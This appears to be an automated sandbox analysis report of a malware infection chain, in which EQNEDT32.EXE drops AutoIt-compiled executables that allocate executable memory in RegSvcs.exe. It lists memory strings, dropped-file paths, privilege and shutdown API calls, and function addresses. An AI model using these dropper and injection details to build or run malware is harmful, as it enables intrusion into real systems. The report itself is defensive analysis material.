                  Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e6e71942-0
                  Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8a996c3d-f
                  Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2f1f07c6-2
                  Source: name.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ef89f19f-6
                  Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c6b2ebc5-6
                  Source: name.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_55d6bc35-1
                  Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a04743ab-d
                  Source: negrett.exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b5ac6e26-5
                  Source: negrett.exe.2.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bd6a790b-0
                  Source: name.exe.5.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_af25db20-4
                  Source: name.exe.5.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bd7c0de8-2
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\negrett.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exeJump to dropped file
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105D5EB: CreateFileW,DeviceIoControl,CloseHandle,8_2_0105D5EB
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01051201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_01051201
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00B7E8F6
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_0105E8F6
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_0139E8F6
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029EA3AC5_3_029EA3AC
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A061D95_3_02A061D9
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F07945_3_029F0794
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029D85C05_3_029D85C0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F0B065_3_029F0B06
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029EAB315_3_029EAB31
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F6E4A5_3_029F6E4A
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F6C1B5_3_029F6C1B
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F0DB05_3_029F0DB0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029D6D205_3_029D6D20
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029E8D7D5_3_029E8D7D
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A092EE5_3_02A092EE
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A5B2445_3_02A5B244
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F13325_3_029F1332
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029DB3405_3_029DB340
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F70A75_3_029F70A7
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F10775_3_029F1077
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A376985_3_02A37698
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A414465_3_02A41446
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029D74605_3_029D7460
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A05B6B5_3_02A05B6B
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A0D8FF5_3_02A0D8FF
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029FBEA05_3_029FBEA0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029DBEF05_3_029DBEF0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_02A63C735_3_02A63C73
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B180605_2_00B18060
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B820465_2_00B82046
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B782985_2_00B78298
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B4E4FF5_2_00B4E4FF
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B4676B5_2_00B4676B
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00BA48735_2_00BA4873
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B3CAA05_2_00B3CAA0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B1CAF05_2_00B1CAF0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B2CC395_2_00B2CC39
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B46DD95_2_00B46DD9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_00FF80608_2_00FF8060
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010620468_2_01062046
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010582988_2_01058298
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0102E4FF8_2_0102E4FF
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0102676B8_2_0102676B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010848738_2_01084873
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_00FFCAF08_2_00FFCAF0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0101CAA08_2_0101CAA0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01026DD98_2_01026DD9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0100CC398_2_0100CC39
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0100B1198_2_0100B119
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_00FF91C08_2_00FF91C0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010113948_2_01011394
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010117068_2_01011706
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0100997D8_2_0100997D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010119B08_2_010119B0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0101781B8_2_0101781B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_00FF79208_2_00FF7920
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01017A4A8_2_01017A4A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01011C778_2_01011C77
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01017CA78_2_01017CA7
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01011F328_2_01011F32
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0107BE448_2_0107BE44
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01029EEE8_2_01029EEE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_001936F08_2_001936F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00408C609_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040DC119_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00407C3F9_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00418CCC9_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00406CA09_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004028B09_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A4BE9_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004182449_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004016509_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402F209_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004193C49_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004187889_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402F899_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402B909_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004073A09_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_003D15609_2_003D1560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_003D15519_2_003D1551
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_003D12B09_2_003D12B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_003D12C09_2_003D12C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A828F09_2_00A828F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A820209_2_00A82020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8741A9_2_00A8741A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A868589_2_00A86858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8BDE19_2_00A8BDE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A81D309_2_00A81D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A84AB89_2_00A84AB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8828A9_2_00A8828A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A856D89_2_00A856D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A826009_2_00A82600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A81A409_2_00A81A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A83FE09_2_00A83FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A82BE09_2_00A82BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8B7209_2_00A8B720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A823109_2_00A82310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A80F489_2_00A80F48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A828E49_2_00A828E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A820109_2_00A82010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A825F19_2_00A825F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A81D209_2_00A81D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8F6D19_2_00A8F6D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8EE219_2_00A8EE21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8F2799_2_00A8F279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A85FA49_2_00A85FA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8AF899_2_00A8AF89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8AF989_2_00A8AF98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A863F89_2_00A863F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A82BD09_2_00A82BD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A83FD49_2_00A83FD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8FB299_2_00A8FB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A80F399_2_00A80F39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A823009_2_00A82300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A8B71F9_2_00A8B71F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00A85B479_2_00A85B47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2E6E09_2_00D2E6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2C6E89_2_00D2C6E8
